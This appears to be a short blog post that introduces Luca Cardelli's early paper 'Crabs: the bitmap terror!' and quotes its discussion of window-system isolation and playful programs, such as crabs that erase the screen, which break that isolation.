<p><p class=lp>Today, window systems seem as inevitable as hierarchical file systems, a fundamental building block of computer systems. But it wasn't always that way. This paper could only have been written in the beginning, when everything about user interfaces was up for grabs.</p>
<blockquote><p class=lp>A bitmap screen is a graphic universe where windows, cursors and icons live in harmony, cooperating with each other to achieve functionality and esthetics. A lot of effort goes into making this universe consistent, the basic law being that every window is a self contained, protected world. In particular, (1) a window shall not be affected by the internal activities of another window. (2) A window shall not be affected by activities of the window system not concerning it directly, i.e. (2.1) it shall not notice being obscured (partially or totally) by other windows or obscuring (partially or totally) other windows, (2.2) it shall not see the <i>image</i> of the cursor sliding on its surface (it can only ask for its position).</p>
<p class=pp>
Of course it is difficult to resist the temptation to break these rules. Violations can be destructive or non-destructive, useful or pointless. Useful non-destructive violations include programs printing out an image of the screen, or magnifying part of the screen in a <i>lens</i> window. Useful destructive violations are represented by the <i>pen</i> program, which allows one to scribble on the screen. Pointless non-destructive violations include a magnet program, where a moving picture of a magnet attracts the cursor, so that one has to continuously pull away from it to keep working. The first pointless, destructive program we wrote was <i>crabs</i>.</p>
</blockquote>
<p class=lp>As the crabs walk over the screen, they leave gray behind, “erasing” the apps underfoot:</p>
<blockquote><img src="https://research.swtch.com/crabs1.png">
</blockquote>
<p class=lp>
For the rest of the story, see Luca Cardelli's “<a style="font-weight: bold;" href="http://lucacardelli.name/Papers/Crabs.pdf">Crabs: the bitmap terror!</a>” (6.7MB). Additional details in “<a href="http://lucacardelli.name/Papers/Crabs%20%28History%20and%20Screen%20Dumps%29.pdf">Crabs (History and Screen Dumps)</a>” (57.1MB).</p></p>